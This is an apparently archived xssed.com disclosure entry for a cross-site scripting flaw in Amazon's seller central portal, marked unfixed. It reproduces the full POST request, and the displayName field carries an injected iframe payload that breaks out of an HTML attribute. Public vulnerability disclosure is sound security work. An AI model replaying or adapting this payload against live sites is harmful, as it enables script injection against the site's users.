Security researcher Side3ffects, has submitted on 18/10/2010 a cross-site-scripting (XSS) vulnerability affecting sellercentral.amazon.com, which at the time of submission ranked 11 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 18/10/2010 |
Date published: 18/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: Side3ffects |
Domain: sellercentral.amazon.com |
Category: XSS |
Pagerank: 11 |
URL: https://sellercentral.amazon.com/gp/seller/pipe/manager.html |
POST: pipe=ssrProductAds&step=2&userName=1211&replyTo=test%40xssed.com&subjectEscape=&subject=Unable+to+re gister+for+Product+Ads&emailMessageEscape=&emailMessage=&displayName=%27%22%3E%3Ciframe+src%3Dhttp:% 2F%2Fxssed.com%3E&companyURL=&address1=&address2=&city=&state=&zipCode=&country=United+States&ccCard holderName=&ccIssuer=V&addCreditCardNumber=&ccExpMonth=10&ccExpYear=2010&businessAddressCheck=useBus inessAddress&billingAddress1=&billingAddress2=&billingCity=&billingState=&billingZipCode=&billingCou ntry=United+States&Continue=&_pi_legalName=121&_pi_tokenID=A1F3841M9ZHMMV&_pi_pipe=ssrProductAds&_pi _email=kf%40xssed.com&_pi_step=1&_pi_areaCode=112&_pi_phone1=121&_pi_userName=1211&_pi_ext=211221212 1&_pi_phone2=1221 |
Click here to view the mirror
|
|
|